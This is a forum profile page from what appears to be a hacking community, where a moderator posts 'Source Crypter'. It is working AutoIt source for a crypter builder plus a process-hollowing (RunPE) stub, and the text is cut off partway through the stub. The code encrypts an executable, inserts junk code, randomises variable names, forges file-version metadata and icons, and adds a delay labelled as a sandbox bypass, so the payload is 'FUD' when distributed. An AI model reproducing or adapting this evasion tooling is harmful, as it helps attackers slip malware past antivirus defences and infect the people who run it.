Jump to content
Report any bug Read more... ×
We're hiring! We are accepting applications for Developers, Teachers, Redactors and Junior Moderators. Read more... ×
Search In
  • More options...
Find results that contain...
Find results in...
News
  • For new users read this
  • Challenges
  • for new users thank you to post in introduction and answer "Accept" on the topic of the rules to have access to the integrity of the forum and receive your Exploit-Code
  • The challenges board is being developed you are likely to encounter some bugs if this is the case report to an administrator.

Backtracking

Moderators
  • Content Count

    7
  • Joined

  • Last visited

  • Days Won

    1
  • Points

    3,243 [ Donate ]

Backtracking last won the day on April 11

Backtracking had the most liked content!

Community Reputation

6 Neutral

1 Follower

About Backtracking

  • Birthday 01/09/1992

Register Information

  • Birth date
    01/09/92

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Backtracking

    Source Crypter

    The best way to make an FUD crypter is to create your own crypter Here you can find the template, dont use it before you modify it! The builder: #include <ButtonConstants.au3> #include <ComboConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include "includes/Junkcode.au3" #include <crypt.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("CarrotCrypter BETA V.0.1", 642, 506, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Pic1 = GUICtrlCreatePic("images/bg.bmp", 0, 0, 641, 97) $Group1 = GUICtrlCreateGroup("File to encrypt", 360, 136, 273, 185) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group1), "wstr", 0, "wstr", 0) $Input1 = GUICtrlCreateInput("File_Input", 368, 176, 193, 21) $Input2 = GUICtrlCreateInput("File_Output", 368, 224, 193, 21) $Button3 = GUICtrlCreateButton("Chose File", 560, 174, 65, 25) $Button4 = GUICtrlCreateButton("Create File", 560, 222, 65, 25) $Label1 = GUICtrlCreateLabel("Chose a name for the encrypted file", 368, 205, 250, 17) $Label2 = GUICtrlCreateLabel("Chose a File to encrypt", 368, 155, 250, 17) $Input3 = GUICtrlCreateInput("", 368, 288, 257, 21) $Label3 = GUICtrlCreateLabel("Chose a passphrase to encrypt your file", 368, 268, 250, 17) GUICtrlCreateGroup("", -99, -99, 1, 1) $Button1 = GUICtrlCreateButton("License", 480, 104, 113, 33) $Button2 = GUICtrlCreateButton("?", 600, 104, 33, 33) $Group2 = GUICtrlCreateGroup("Encryption", 360, 328, 273, 169) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group2), "wstr", 0, "wstr", 0) $Checkbox1 = GUICtrlCreateCheckbox("x64 (Can solve compability problems)", 376, 352, 241, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox1), "wstr", 0, "wstr", 0) $Checkbox2 = GUICtrlCreateCheckbox("Manual compiling", 376, 384, 241, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox2), "wstr", 0, "wstr", 0) $Button5 = GUICtrlCreateButton("ENCRYPT MY FILE", 376, 416, 249, 73) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group3 = GUICtrlCreateGroup("USG", 8, 104, 337, 393) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group3), "wstr", 0, "wstr", 0) $Group4 = GUICtrlCreateGroup("Custom Stub", 16, 128, 321, 265) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group4), "wstr", 0, "wstr", 0) $Checkbox3 = GUICtrlCreateRadio("Create a custom stub (high security)", 32, 152, 289, 33) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox3), "wstr", 0, "wstr", 0) $Combo1 = GUICtrlCreateCombo("AES 256", 152, 184, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "3DES|DES|RC2") $Combo2 = GUICtrlCreateCombo("0% junk code (speed)", 152, 224, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "25% junk code (speed)|50% junk code (medium)|75% junk code (security)") $Label5 = GUICtrlCreateLabel("Encryption mode", 32, 184, 100, 17) $Label6 = GUICtrlCreateLabel("Junk code generator", 32, 224, 100, 17) $Group6 = GUICtrlCreateGroup("Icon changer", 24, 264, 305, 121) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group6), "wstr", 0, "wstr", 0) $Input4 = GUICtrlCreateInput(".ico", 32, 328, 201, 21) $Button7 = GUICtrlCreateButton("Chose Icon", 240, 328, 81, 25) $Label7 = GUICtrlCreateLabel("Here you can chose a new Icon for your file. Chosing a new Icon increases the security.", 32, 290, 284, 41) $Button8 = GUICtrlCreateButton("Chose a precreated Icon", 32, 352, 289, 25) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group5 = GUICtrlCreateGroup("More oprions", 16, 400, 321, 89) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group5), "wstr", 0, "wstr", 0) $Label4 = GUICtrlCreateLabel("More Options: external stub, File informations and further security...", 50, 435, 200, 30) $Button6 = GUICtrlCreateButton("MORE OPTIONS", 232, 424, 97, 49) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### $Informations = GUICreate("More Options", 252, 363, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Compile_Info = GUICtrlCreateGroup("File informations", 8, 0, 233, 281) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Compile_Info), "wstr", 0, "wstr", 0) $Check1 = GUICtrlCreateCheckbox("Create custom File informations", 24, 24, 201, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check1), "wstr", 0, "wstr", 0) $Company = GUICtrlCreateInput("Company", 24, 56, 201, 21) $Description = GUICtrlCreateInput("Description", 24, 88, 201, 21) $Version = GUICtrlCreateInput("Version", 24, 120, 201, 21) $CopyRight = GUICtrlCreateInput("Copyright", 24, 152, 201, 21) $ProductName = GUICtrlCreateInput("Product Name", 24, 184, 201, 21) $ProductVersion = GUICtrlCreateInput("Product Version", 24, 216, 201, 21) $OriginalName = GUICtrlCreateInput("Original Executable Name", 24, 248, 201, 21) GUICtrlCreateGroup("", -99, -99, 1, 1) $lab2 = GUICtrlCreateButton("Random File informations", 8, 296, 233, 25) $Check3 = GUICtrlCreateCheckbox("Create Delay to bypass Sandbox", 8, 328, 233, 25) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check3), "wstr", 0, "wstr", 0) GUISetState(@SW_HIDE) ;STYLLEE GUICtrlSetState($Combo1,$GUI_DISABLE) GUICtrlSetState($Combo2,$GUI_DISABLE) GUICtrlSetState($Input4,$GUI_DISABLE) GUICtrlSetState($Button7,$GUI_DISABLE) GUICtrlSetState($Button8,$GUI_DISABLE) GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) GUICtrlSetBkColor($Button1, 0xe6830e) GUICtrlSetColor($Button1, 0xffffff) GUICtrlSetBkColor($Button2, 0xe6830e) GUICtrlSetColor($Button2, 0xffffff) GUICtrlSetBkColor($Button3, 0xe6830e) GUICtrlSetColor($Button3, 0xffffff) GUICtrlSetBkColor($Button4, 0xe6830e) GUICtrlSetColor($Button4, 0xffffff) GUICtrlSetBkColor($Button5, 0xe6830e) GUICtrlSetColor($Button5, 0xffffff) GUICtrlSetBkColor($Button6, 0xe6830e) GUICtrlSetColor($Button6, 0xffffff) GUICtrlSetBkColor($Button7, 0xe6830e) GUICtrlSetColor($Button7, 0xffffff) GUICtrlSetBkColor($Button8, 0xe6830e) GUICtrlSetColor($Button8, 0xffffff) GUICtrlSetColor($label1, 0xffffff) GUICtrlSetColor($label2, 0xffffff) GUICtrlSetColor($label3, 0xffffff) GUICtrlSetColor($label4, 0xffffff) GUICtrlSetColor($label5, 0xffffff) GUICtrlSetColor($label6, 0xffffff) GUICtrlSetColor($label7, 0xffffff) GUICtrlSetColor($Group1, 0xffffff) GUICtrlSetColor($Group2, 0xffffff) GUICtrlSetColor($Group3, 0xffffff) GUICtrlSetColor($Group4, 0xffffff) GUICtrlSetColor($Group5, 0xffffff) GUICtrlSetColor($Group6, 0xffffff) GUICtrlSetColor($Compile_Info, 0xffffff) GUICtrlSetColor($Checkbox1, 0xffffff) GUICtrlSetColor($Checkbox2, 0xffffff) GUICtrlSetColor($Checkbox3, 0xffffff) GUICtrlSetColor($Check1, 0xffffff) GUICtrlSetColor($lab2, 0xffffff) GUICtrlSetBkColor($lab2, 0xe6830e) GUICtrlSetColor($Check3, 0xffffff) $pwd = "" Dim $aSpace[3] $digits = 15 For $i = 1 To $digits $aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z $aSpace[1] = Chr(Random(97, 122, 1)) ;a-z $aSpace[2] = Chr(Random(48, 57, 1)) ;0-9 $pwd &= $aSpace[Random(0, 2, 1)] Next GUICtrlSetData($Input3, $pwd) ;ENDSTYYKLE $Includes = '#include "' & @ScriptDir & '\includes\crypt.au3"' & @CRLF $Delay = "" FileChangeDir(@ScriptDir) While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button6 GUISetState(@SW_SHOW, $Informations) While 1 Switch GUIGetMsg() Case $GUI_EVENT_CLOSE GUISetState(@SW_HIDE, $Informations) ExitLoop Case $Check1 If GUICtrlRead($Check1) = $GUI_CHECKED Then GUICtrlSetState($Company,$GUI_ENABLE) GUICtrlSetState($Description,$GUI_ENABLE) GUICtrlSetState($Version,$GUI_ENABLE) GUICtrlSetState($CopyRight,$GUI_ENABLE) GUICtrlSetState($ProductName,$GUI_ENABLE) GUICtrlSetState($ProductVersion,$GUI_ENABLE) GUICtrlSetState($OriginalName,$GUI_ENABLE) Else GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) EndIf Case $Check3 $Delay = "sleep(45000)" & @CRLF Case $lab2 $YEAH = _RandomString() $YEAH1 = _RandomString() $YEAH2 = _RandomVersion() $YEAH3 = _RandomString() $YEAH4 = _RandomString() $YEAH5 = _RandomVersion() $YEAH6 = _RandomString() GUICtrlSetData($Company, $YEAH) GUICtrlSetData($Description, $YEAH1) GUICtrlSetData($Version, $YEAH2) GUICtrlSetData($CopyRight, $YEAH3) GUICtrlSetData($ProductName, $YEAH4) GUICtrlSetData($ProductVersion, $YEAH5) GUICtrlSetData($OriginalName, $YEAH6) EndSwitch WEnd Case $Button3 $SourceFile = FileOpenDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input1, $SourceFile) Case $Button4 $DestinationFile = FileSaveDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input2, $DestinationFile) Case $Button7 $Icon = FileOpenDialog("C:/",@ScriptDir&'\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button8 $Icon = FileOpenDialog("C:/",@ScriptDir&'\icons\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button5 ;errors If GUICtrlRead($Input1) == "File_Input" Then msgbox(0, "Error", "Please chose a File to encrypt") Endif ;fin errors Switch GUICtrlRead($Combo1) Case "3DES" $algo = $CALG_3DES Case "DES" $algo = $CALG_DES Case "RC2" $algo = $CALG_RC2 Case "AES 256" $algo = $CALG_AES_256 EndSwitch Switch GUICtrlRead($Combo2) Case "0% junk code (speed)" $Junk = @CRLF & _JunkCreate(0) & @CRLF $Junk1 = @CRLF & _JunkCreate(0) & @CRLF $Junk2 = @CRLF & _JunkCreate(0) & @CRLF Case "25% junk code (speed)" $Junk = @CRLF & _JunkCreate(50) & @CRLF $Junk1 = @CRLF & _JunkCreate(50) & @CRLF $Junk2 = @CRLF & _JunkCreate(50) & @CRLF Case "50% junk code (medium)" $Junk = @CRLF & _JunkCreate(100) & @CRLF $Junk1 = @CRLF & _JunkCreate(100) & @CRLF $Junk2 = @CRLF & _JunkCreate(100) & @CRLF Case "75% junk code (security)" $Junk = @CRLF & _JunkCreate(150) & @CRLF $Junk1 = @CRLF & _JunkCreate(150) & @CRLF $Junk2 = @CRLF & _JunkCreate(150) & @CRLF Endswitch $sSourceRead = GUICtrlRead($Input1) $sDestinationRead = GUICtrlRead($Input2) $sPasswordRead = GUICtrlRead($Input3) $Company = GUICtrlRead($Company) $Description = GUICtrlRead($Description) $Version = GUICtrlRead($Version) $CopyRight = GUICtrlRead($CopyRight) $ProductName = GUICtrlRead($ProductName) $ProductVersion = GUICtrlRead($ProductVersion) $OriginalName = GUICtrlRead($OriginalName) $pragma = "#pragma compile(CompanyName, " & $Company & ")" & @CRLF & "#pragma compile(FileDescription, " & $Description & ")" & @CRLF & "#pragma compile(FileVersion, " & $Version & ")" & @CRLF & "#pragma compile(LegalCopyright, " & $Copyright & ")" & @CRLF & "#pragma compile(OriginalFilename, " & $OriginalName & ".exe )" & @CRLF & "#pragma compile(ProductName, " & $ProductName & ")" & @CRLF & "#pragma compile(ProductVersion, " & $ProductVersion & ")" & @CRLF $sIcon = GUICtrlRead($Input4) $BIN = _Binary($sSourceRead) FileChangeDir(@ScriptDir) ;---------------------CUSTOM STUB VARIABLES------------------------------ $r1 = _RandomStringForRandomStub() ;Generate Random Variables $nRvar = 1 Dim $rV[100] while $nRvar < 100 $rV[$nRvar] = "$" & _RandomStringForRandomStub() $nRvar = $nRvar + 1 Wend ;Create the new stub $Stub = FileOpen("includes/AZERR.au3") $Content = FileRead($Stub) FileClose($Stub) ;File changes : string modification $MainFunc = StringReplace($Content, "$bBinaryImage", $rV[1]) $MainFunc1 = StringReplace($MainFunc, "_AZERR", $r1) $MainFunc2 = StringReplace($MainFunc1, "$sCommandLine", $rV[2]) $MainFunc3 = StringReplace($MainFunc2, "$sExeModule", $rV[3]) $MainFunc4 = StringReplace($MainFunc3, "$fAutoItX64", $rV[4]) $MainFunc5 = StringReplace($MainFunc4, "$bBinary", $rV[5]) $MainFunc6 = StringReplace($MainFunc5, "$tBinary", $rV[6]) $MainFunc7 = StringReplace($MainFunc6, "$iNewPID", $rV[7]) $MainFunc8 = StringReplace($MainFunc7, "$pPointer", $rV[8]) $MainFunc9 = StringReplace($MainFunc8, "$tSTARTUPINFO", $rV[9]) $MainFunc10 = StringReplace($MainFunc9, "$tPROCESS_INFORMATION", $rV[10]) $MainFunc11 = StringReplace($MainFunc10, "$aCall", $rV[11]) $MainFunc12 = StringReplace($MainFunc11, "$hProcess", $rV[12]) $MainFunc13 = StringReplace($MainFunc12, "$hThread", $rV[13]) $MainFunc14 = StringReplace($MainFunc13, "$iRunFlag", $rV[14]) $MainFunc15 = StringReplace($MainFunc14, "$tCONTEXT", $rV[15]) $MainFunc16 = StringReplace($MainFunc15, "$CONTEXT_FULL", $rV[16]) $MainFunc17 = StringReplace($MainFunc16, "$pPEB", $rV[17]) Func _RandomStringForRandomStub() $rString = "" Dim $aRr[2] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $rString &= $aRr[Random(0, 1, 1)] Next Return $rString EndFunc ;----------------------------------------------------------------------------------------- $RUN = @CRLF & $r1 & '($SDER)' & @CRLF $encryptedpass = @CRLF & "$SDER = _Crypt_DecryptData($bBinary, '" & $sPasswordRead & "', " & $algo & ")" If GUICtrlRead($Check1) = $GUI_CHECKED Then FileWrite($sDestinationRead & ".au3", $pragma & $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) Else FileWrite($sDestinationRead & ".au3", $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) EndIf If FileExists($sDestinationRead & ".au3") = 1 Then If GUICtrlRead($Input4) == ".ico" Then If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x86") Endif Else If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x86") Endif EndIf sleep(200) If GUICtrlRead($Checkbox2) = $GUI_CHECKED Then FileDelete($sDestinationRead & ".exe") Else FileDelete($sDestinationRead & ".au3") Endif msgbox(0, "Encryption finished", "You can now distribute your file with security") EndIf Case $Button2 msgbox(0, "Informations - Carrotcrypter", "Help" & @CRLF & " -Contact our customer team at Carrotnet.cf" & @CRLF & "Informations" & @CRLF & " -Created by Carrotinblack" & @CRLF & " -2017 copyright Thecarrotnet ©") Case $Checkbox3 GUICtrlSetState($Combo1,$GUI_ENABLE) GUICtrlSetState($Combo2,$GUI_ENABLE) GUICtrlSetState($Input4,$GUI_ENABLE) GUICtrlSetState($Button7,$GUI_ENABLE) GUICtrlSetState($Button8,$GUI_ENABLE) EndSwitch WEnd Func _Binary($FTOB) Local $hModule = FileOpen($FTOB, 16) If @error Then Exit Global $bBinary = FileRead($hModule) FileClose($hModule) $bBinary = _Crypt_EncryptData($bBinary, $sPasswordRead, $algo) Local Const $MAX_LINESIZE = 4095 Local $iNewLine, $j Local $iChinkSize = 32 Local $sBinary For $i = 1 To BinaryLen($bBinary) Step $iChinkSize $j += 1 If 4*($j * $iChinkSize) > $MAX_LINESIZE - 129 Then $iNewLine = 1 EndIf If $iNewLine Then $iNewLine = 0 $j = 0 $sBinary = StringTrimRight($sBinary, 5) $sBinary &= @CRLF & '$bBinary &= "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF ContinueLoop EndIf If $i = 1 Then $sBinary &= '$bBinary = "' & BinaryMid($bBinary, $i, $iChinkSize) & '" & _' & @CRLF Else $sBinary &= ' "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF EndIf Next $sBinary = StringTrimRight($sBinary, 5) Return $sBinary Endfunc The Public Stub : Global $iNewPID Func _AZERR($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe) #Region 1. DETERMINE INTERPRETER TYPE Local $fAutoItX64 = @AutoItX64 #Region 2. PREDPROCESSING PASSED Local $bBinary = Binary($bBinaryImage) ; this is redundant but still... ; Make structure out of binary data that was passed Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]") DllStructSetData($tBinary, 1, $bBinary) ; fill it ; Get pointer to it Local $pPointer = DllStructGetPtr($tBinary) #Region 3. CREATING NEW PROCESS ; STARTUPINFO structure (actually all that really matters is allocated space) Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _ "ptr Reserved;" & _ "ptr Desktop;" & _ "ptr Title;" & _ "dword X;" & _ "dword Y;" & _ "dword XSize;" & _ "dword YSize;" & _ "dword XCountChars;" & _ "dword YCountChars;" & _ "dword FillAttribute;" & _ "dword Flags;" & _ "word ShowWindow;" & _ "word Reserved2;" & _ "ptr Reserved2;" & _ "ptr hStdInput;" & _ "ptr hStdOutput;" & _ "ptr hStdError") ; This is much important. This structure will hold very some important data. Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _ "ptr Thread;" & _ "dword ProcessId;" & _ "dword ThreadId") ; Create new process Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _ "wstr", $sExeModule, _ "wstr", $sCommandLine, _ "ptr", 0, _ "ptr", 0, _ "int", 0, _ "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential "ptr", 0, _ "ptr", 0, _ "ptr", DllStructGetPtr($tSTARTUPINFO), _ "ptr", DllStructGetPtr($tPROCESS_INFORMATION)) ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed ; Get new process and thread handles: Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process") Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread") ; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures) If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(2, 0, 0) EndIf #Region 4. FILL CONTEXT STRUCTURE ; CONTEXT structure is what's really important here. It's processor specific. Local $iRunFlag, $tCONTEXT If $fAutoItX64 Then If @OSArch = "X64" Then $iRunFlag = 2 $tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses "dword ContextFlags; dword MxCsr;" & _ ; Control flags "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers "uint64 Rip;" & _ ; Program counter "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!) "uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!) "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers Else $iRunFlag = 3 ; FIXME - Itanium architecture ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(102, 0, 0) EndIf Else $iRunFlag = 1 $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL "byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS EndIf ; Define CONTEXT_FULL Local $CONTEXT_FULL Switch $iRunFlag Case 1 $CONTEXT_FULL = 0x10007 Case 2 $CONTEXT_FULL = 0x100007 Case 3 $CONTEXT_FULL = 0x80027 EndSwitch ; Set desired access DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL) ; Fill CONTEXT structure: $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _ "handle", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed EndIf ; Pointer to PEB structure Local $pPEB Switch $iRunFlag Case 1 $pPEB = DllStructGetData($tCONTEXT, "Ebx") Case 2 $pPEB = DllStructGetData($tCONTEXT, "Rdx") Case 3 ; NEVER BE - Itanium architecture EndSwitch #Region 5. READ PE-FORMAT ; Start processing passed binary data. 'Reading' PE format follows. ; First is IMAGE_DOS_HEADER Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _ "word BytesOnLastPage;" & _ "word Pages;" & _ "word Relocations;" & _ "word SizeofHeader;" & _ "word MinimumExtra;" & _ "word MaximumExtra;" & _ "word SS;" & _ "word SP;" & _ "word Checksum;" & _ "word IP;" & _ "word CS;" & _ "word Relocation;" & _ "word Overlay;" & _ "char Reserved[8];" & _ "word OEMIdentifier;" & _ "word OEMInformation;" & _ "char Reserved2[20];" & _ "dword AddressOfNewExeHeader", _ $pPointer) ; Save this pointer value (it's starting address of binary image headers) Local $pHEADERS_NEW = $pPointer ; Move pointer $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header ; Get "Magic" Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic") ; Check if it's valid format If Not ($sMagic == "MZ") Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(4, 0, 0) ; MS-DOS header missing. EndIf ; In place of IMAGE_NT_SIGNATURE Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer) ; Move pointer $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure ; Check signature If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword. EndIf ; In place of IMAGE_FILE_HEADER Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _ "word NumberOfSections;" & _ "dword TimeDateStamp;" & _ "dword PointerToSymbolTable;" & _ "dword NumberOfSymbols;" & _ "word SizeOfOptionalHeader;" & _ "word Characteristics", _ $pPointer) ; I could check here if the module is relocatable ; Local $fRelocatable ; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False ; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead) ; Get number of sections Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections") ; Move pointer $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure ; In place of IMAGE_OPTIONAL_HEADER Local $tMagic = DllStructCreate("word Magic;", $pPointer) Local $iMagic = DllStructGetData($tMagic, 1) Local $tIMAGE_OPTIONAL_HEADER If $iMagic = 267 Then ; x86 version If $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "dword BaseOfData;" & _ "dword ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ "word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "dword SizeOfStackReserve;" & _ "dword SizeOfStackCommit;" & _ "dword SizeOfHeapReserve;" & _ "dword SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER ElseIf $iMagic = 523 Then ; x64 version If Not $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "uint64 ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ 